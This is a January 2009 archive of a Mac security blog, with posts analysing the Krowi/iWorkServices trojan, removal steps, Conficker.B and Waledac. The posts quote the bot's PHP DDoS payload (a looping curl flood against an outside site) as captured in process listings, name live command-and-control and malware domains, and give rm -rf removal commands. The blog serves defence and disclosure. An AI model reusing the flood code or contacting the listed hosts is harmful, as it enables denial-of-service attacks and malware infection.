Archive

Archive for January, 2009

New Offer from Rogue “iMunizator”

January 30, 2009 1 comment

Looks familiar? Yes, we’ve seen this last year January from “MacSweeper” – the first Rogue in Mac.  The authors tries to defend their application and fixed it but the damage was already there.  Months later, a rebranded version “Imunizator” came out. This week we’ve seen its update and its too rogue “LifeTime” offers.
imuni

new_offer1

Categories: OSX Rogue Application Tags: , , , , ,

Latest OS X threat Krowi installs “DivX”

January 27, 2009 2 comments

krowib_iconLatest update of threat Krowi was found in Adobe Photoshop cracker installer. 

Not much difference with “iWorkServices” except with the repackaging and name. However, this should serve as a reminder to be extra careful in downloading stuff!   

 

krowibstrings

Once installed, you’ll find these files and port activity below.

divx

How to Remove? It’s the same as the previous instruction except that you have to change the name from “iWorkServices” to “DivX”.

Categories: Malwares Tags: , , , ,

How To Remove “iWorkServices”

January 26, 2009 3 comments

I noticed that few traffics coming in are looking on how to remove “iWorkServices”.

So, here’s a manual or  ”Do It Yourself” steps: 

Open Terminal – >  /Application/Utilities/Terminal.app 

Check if “iWorkServices” is running, to do you can choose any of the options below: 

**Note: These commands requires root privileges to execute, to avoid re-entering your password everytime type – > ”sudo su“.

 

  1. Check for “iworkservices” running process by typing “lsof -c iwork” or “lsof -c iWork“, just check which one works for you. 

 

sudo_02

Monitoring ” iWorkServices” background activity, you will notice TCP connections changes as it tries to communicate to 69.92.177.146:59201 and  qwfojzlk.freehostia.com:1024.

sudo_03

              1.1 If you know the PID or process ID then typing “lsof -p <PID>” will also give the same result.  

        2. Since we already confirmed the presence of this threat in the system, you could start removing them through executing the following commands:  

            rm -rf /System/Library/StartupItems/iWorkServices 

            rm /usr/bin/iWorkServices

            rm /private/tmp/.iWorkServices

            rm -rf /Library/Receipts/iWorkServices.pkg

            killall -9 iWorkServices

              2.1 Or you can copy the same instruction and make a small bash script, as exampled below:

#!/bin/bash
#This is a simple script to delete iworkservices files terminate running process
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
exit

You can write these instructions to any text editor like TextEdit (/Applications/TextEdit.app). 

textedit1

 

 

 

 

 

 

 

 

Open terminal and type “chmod +rwx <filename>” as exampled below. **Notice that I am root user here, so don’t forget to type “sudo su“, so your script will execute properly.**

chmod

And, execute it by typing “./<your_filename>.sh“.  In this example, I am executing “./remove.sh“, please refer the sequence below.                                                                                                                                                                                                           
                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                           
Ok,  for those who want to just “Click and Remove”, SecureMac provides a free clean-up tool and you can download directly from this link: 
http://macscan.securemac.com/files/iWorkServicesTrojanRemovalTool.dmg                                                                                                                                                                                                             
I have tested it and it’s a good tool to do the job for you! (“,                                                                                                                                                                                                                                                
If this instruction works, then i’ll be excited to hear your story.  I am pleased and overwhelmed on how much feedbacks I received from my previous blog article “How to Remove MacAccess” .  I hope this will be useful as well… 

Please feel free to drop a message and hopefully with additional information such as:

  • How did you get infected ? (website? )
  • Do you still have a copy of the application you installed ?  If yes, please send it to this email address:  meths101 (at) optusnet (dot) com (dot) au ; or just send me a link where I can download it.
  • Any unusual behavior found in your computer.

Happy Holidays!!! –> As of writing, it is a nice sunny “Australian day” today and I still feel sleepy for watching Australian Open last night. It was fun and amazing crowd!  

Categories: Malwares Tags: , , , , , , , ,

Top & Active

January 24, 2009 Leave a comment

dashboard_2401091

Indeed this data speaks a thousand words!

Categories: Daily Thoughts Tags: , ,

Update: “iWorkServices” Not Just A Trojan

January 23, 2009 4 comments

Let’s call the bad iWork as Krowi.

So, the story starts when OS X user will download an iWork 09 installation package with serial key through BitTorrent.

files

Take note that  Krowi is often found on a package “iWork09.zip” with filesize 450.4MB. Upon extracting, you’ll find  NO “iWorkServices” here instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the content of “iWork09Trial.mpkg” you’ll find nasty Krowi “iWorkServices.pkg” piggybacking.

iworkpackage

The file “preflight” contains a one line instruction, which is executing the mach-o binary file “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keep a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find “iWorkServices” process is running in background and it will persistently attempts to report to its command and control channels.

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

example

Krowi is a nasty P2P controlled bot that is similar to known Storm Worm.

Infected OS X users machine can be controlled remotely by the bot master.  It can be used to participate in a massive Distributed Denial of Service attack(DDoS) , install further application (like software from Pay-per-Install ), spam and distribute malware and may gather user data.

Looking further, this malware comes with a Lua interpreter which is described as “powerful, fast, light-weight, embeddable scripting language”. This could expand further the capability of the attacker to the affected machine.  An automated master could respond and push PHP script …

Imagine,  load and run!

++++++++++++++++

Update 24th Jan: I just want to link few infection report I found around the net that was able to capture PHP scripts running on their box: 

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)  

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)

Categories: Malwares Tags: , , , , , , , , , ,

Latest OS X Threat: “iWorkServices”

January 22, 2009 16 comments

A new OS X threat disguised as a legitimate application iWork 09 currently in-the-wild. Few OS X users had been tricked by this, so be careful! 

This malicious piece of code could create startup entry and copy itself as /usr/bin/iWorkServices. 

picture-1

 

picture-2

 

 Once installed, it will attempt to remotely communicate and execute HTTP request. It will also create /tmp/.iWorkServices and sets CHMOD 755 which is a read and execute for everyone, which may relate to its P2P activity. 

It is  also referencing to “Users/jason/diarrhea/aes/aes_modes.c”. 

 

 

Notice that this will also attempt to connect in this URL: 

picture-3

Ok, so the culprit is in Mach-O universal binary format: 

picture-4

I know this details are not enough, for now I can say that this is indeed a threat; a backdoor, trojan and P2P controlled bot. **Updated

**Note the file size that contains this threat is ~ 450MB**

Btw, this is currently discussed here: 

http://thepiratebay.org/torrent/4630952/iWork.09

http://thepiratebay.org/torrent/4627720/iWork__09_Trial

Categories: Malwares Tags: , , , ,

OS X Vulnerability In 2008

January 17, 2009 Leave a comment

Here’s worth noting information from Secunia.

iphone1

 

osx1

Categories: Vulnerability

Safari Vulnerability Could Expose Users Data

January 17, 2009 Leave a comment

A severe critical flaw in Safari was recently discovered and NO available patch yet released as of writing.  Brian Mastenbrook discovered this vulnerability last 13th January and disclosed the following information below:  [Further reading

————————————————————————————-

I have discovered that Apple’s Safari browser is vulnerable to an attack that allows a malicious web site to read files on a user’s hard drive without user intervention. This can be used to gain access to sensitive information stored on the user’s computer, such as emails, passwords, or cookies that could be used to gain access to the user’s accounts on some web sites. The vulnerability has been acknowledged by Apple.

All users of Mac OS X 10.5 Leopard who have not performed the workaround steps listed below are affected, regardless of whether they use any RSS feeds. Users of previous versions of Mac OS X are not affected.

Users of Firefox, Camino, and Opera on Mac OS X are substantially better protected against exploitation by a malicious web page than users of Safari or OmniWeb. If users of these browsers are asked to open a link in Safari, they should not allow the request and close the page which triggered the request immediately. All users of Mac OS X may still be affected by clicking on a malicious link from their email client, instant messaging program, or another application, and should perform the workaround steps given below.

————————————————————————————-

Good thing, there was no technical details disclosed. For sure, nosy attackers would never let it slipped without jumping into this opportunity.

Categories: Emerging Threats, Exploits Tags: , , , ,

Worm, Worm, Worm

January 10, 2009 Leave a comment

Conficker.B is a worm that has been very busy lately and still currently active attacking systems and networks.  This nasty threat propagates through network shares,  removable drive using autorun.inf and exploits MS08-067 vulnerability.
The infection sequence of this worm (once inside the network)  is as follows:

1. Scans network shares such as IPC$, ADMIN$, browse through ActiveDirectory. So, it is going to
work hard to get into other machine in the network. Unfortunately, if you are using weak password, then you are very vulnerable since it uses password dictionary attack.

2. It sends crafted packet exploiting Windows Server Service using NetPathCanonicalize()

3. Any machine that will respond to any of this attack, this worm will transfer the file specifically in ystem32 directory “\System32\<random filename>.dll”

4. Using “NetAddScheduledJob” it creates a scheduled job to execute itself executing its DLL file through rundll32 command. Since the worm cannot check which machine has already infected, scheduled job will continously gets created, flooding it with jobs which is a result of its  successful attack.

5. What’s difficult with this worm, is that when installed it creates Access Control Entry for the DLL file which limit users’access rights on the file. As a result, the file will be difficult to scan and delete by most security scanners.

6. Another problem, this worm is not EXE instead a DLL and when running it injects itself to svchost.exe and there after to all running processes. It writes itself on different address space, making it persistent memory resident which means, deleting the file doesn’t mean the worm will successfully get terminated. As an effect, the worm could still attack other machine and so could cause re-infection.

7. It disables or stops services, block access to a list of websites mostly security related and access pre-computed domain names (this is not-hard coded, so you can generate a list) which this worm may attempt to access to download any file.

Zarestel provided good blog article and analysis. The decrypted packet clearly shows that affected machine will turn to be an attacker within the network.  Take note of the packet activity as shown in the screenshot and notice that you can monitor your network and check for SMB protocol, network shares enumeration \IPC$, \browser and NetPathCanonicalize request.

Also a collegue in Microsoft, Jireh created good analysis as well.

Another worm, Waledac sounds like wild-duck =)  Yes it is a wild for being active on sending us with eCard.exe.  Further reading:  TrendMicro, CA, ThreatFire

ShadowServer published a latest list of Waledac active websites. Here’s a partial list:  **Do NOT go to these sites, unless you know how to handle malware

bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
eternalgreetingcard.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
greatmirabellasite.com
greetingcardcalendar.com
greetingcardgarb.com
greetingguide.com
greetingsupersite.com

Another  mass-mailing worm that spams email using a legitimate images from Ikea, Hallmark and perhaps more other sites.  It targets IIS web servers and attempts to change the index file to a fake security alert and disguising a fix for MS09-067. What?!? Yes, MS09 (2009) …This worm has sense of humor. Further reading here

Categories: Daily Thoughts, Emerging Threats Tags: , , , , , , , , , , , ,
Follow

Get every new post delivered to your Inbox.